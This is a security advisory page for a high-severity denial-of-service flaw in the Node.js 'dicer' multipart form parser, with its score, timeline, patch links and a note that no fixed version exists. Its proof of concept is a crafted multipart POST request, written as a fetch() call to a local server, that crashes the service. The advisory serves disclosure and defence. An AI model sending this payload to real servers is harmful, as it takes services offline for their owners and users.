SNYK-JS-DICER-2311764

SNYK-JS-DICER-2311764 PUBLISHED CVSS 7.5 HIGH

## Overview Affected versions of this package are vulnerable to Denial of Service (DoS). A malicious attacker can send a modified form to server, and crash the nodejs service. An attacker could sent the payload again and again so that the service continuously crashes. ## PoC await fetch('http://127.0.0.1:8000', { method: 'POST', headers: { ['content-type']: 'multipart/form-data; boundary=----WebKitFormBoundaryoo6vortfDzBsDiro', ['content-length']: '145', connection: 'keep-alive', }, body: '------WebKitFormBoundaryoo6vortfDzBsDiro\r\n Content-Disposition: form-data; name="bildbeschreibung"\r\n\r\n\r\n------WebKitFormBoundaryoo6vortfDzBsDiro--' }); ## Remediation There is no fixed version for `dicer`. ## References - [GitHub Commit](https://github.com/mscdex/dicer/pull/22/commits/b7fca2e93e8e9d4439d8acc5c02f5e54a0112dac) - [GitHub Issue](https://github.com/mscdex/busboy/issues/250) - [GitHub PR](https://github.com/mscdex/dicer/pull/22)

Risk Scores

CVSS v3.1

7.5

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C

Affected Products

Vendor	Product	Versions

Timeline

Dec 7, 2021 CVE Updated
May 19, 2022 CVE Published

References

https://security.snyk.io/vuln/SNYK-JS-DICER-2311764 advisory
https://learn.snyk.io/lesson/redos/ technical
https://github.com/mscdex/dicer/pull/22/commits/b7fca2e93e8e9d4439d8acc5c02f5e54a0112dac patch
https://github.com/mscdex/busboy/issues/250 issue
https://github.com/mscdex/dicer/pull/22 patch
http://127.0.0.1:8000' technical

Open in Interactive Console →